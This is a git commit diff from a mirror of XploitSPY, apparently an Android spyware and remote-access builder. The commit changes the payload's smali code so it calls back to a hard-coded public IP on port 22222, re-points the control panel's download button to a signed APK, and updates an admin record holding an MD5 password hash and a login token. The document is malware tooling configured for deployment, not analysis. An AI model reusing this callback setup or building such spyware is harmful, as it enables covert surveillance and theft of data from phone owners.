mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2024-11-05 09:59:20 +08:00
Fixed download link
This commit is contained in:
parent
c9ffd62dfd
commit
577bf2f3db
Binary file not shown.
@ -64,7 +64,7 @@
|
||||
|
||||
invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
|
||||
|
||||
const-string v2, "http://127.0.0.1:22222?model="
|
||||
const-string v2, "http://3.6.95.182:22222?model="
|
||||
|
||||
invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
|
||||
|
||||
|
@ -41,7 +41,7 @@
|
||||
<div class="ui form" id="download" style="display: none">
|
||||
<div class="inline fields">
|
||||
<div class="eight wide field">
|
||||
<a class="blue ui fluid button" download="XploitSPY.apk" href="/build.s.apk"><i
|
||||
<a class="blue ui fluid button" download="XploitSPY.apk" href="/build-aligned-signed.apk"><i
|
||||
class="download icon"></i>Download</a>
|
||||
</div>
|
||||
</div>
|
||||
@ -101,4 +101,4 @@
|
||||
<% include partials/footer.ejs %>
|
||||
</body>
|
||||
|
||||
</html>
|
||||
</html>
|
||||
|
Binary file not shown.
Binary file not shown.
@ -2,7 +2,7 @@
|
||||
"admin": {
|
||||
"username": "admin",
|
||||
"password": "5f4dcc3b5aa765d61d8327deb882cf99",
|
||||
"loginToken": "4dd3330252bce2d920ce8ed89c1be2f8",
|
||||
"loginToken": "b7b6c4683ac1999e0a4581d80470ab85",
|
||||
"logs": [
|
||||
{
|
||||
"time": "2020-01-11T15:23:07.971Z",
|
||||
@ -13,6 +13,11 @@
|
||||
"time": "2020-01-11T15:27:32.586Z",
|
||||
"type": "SUCCESS",
|
||||
"message": "Build Succeded!"
|
||||
},
|
||||
{
|
||||
"time": "2020-01-11T16:08:04.582Z",
|
||||
"type": "SUCCESS",
|
||||
"message": "Build Succeded!"
|
||||
}
|
||||
],
|
||||
"ipLog": []
|
||||
|
2
server/package-lock.json
generated
2
server/package-lock.json
generated
@ -873,4 +873,4 @@
|
||||
"integrity": "sha1-AI4G2AlDIMNy28L47XagymyKxBk="
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -17,4 +17,4 @@
|
||||
"lowdb": "^1.0.0",
|
||||
"socket.io": "^2.2.0"
|
||||
}
|
||||
}
|
||||
}
|
||||
|
Loading…
Reference in New Issue
Block a user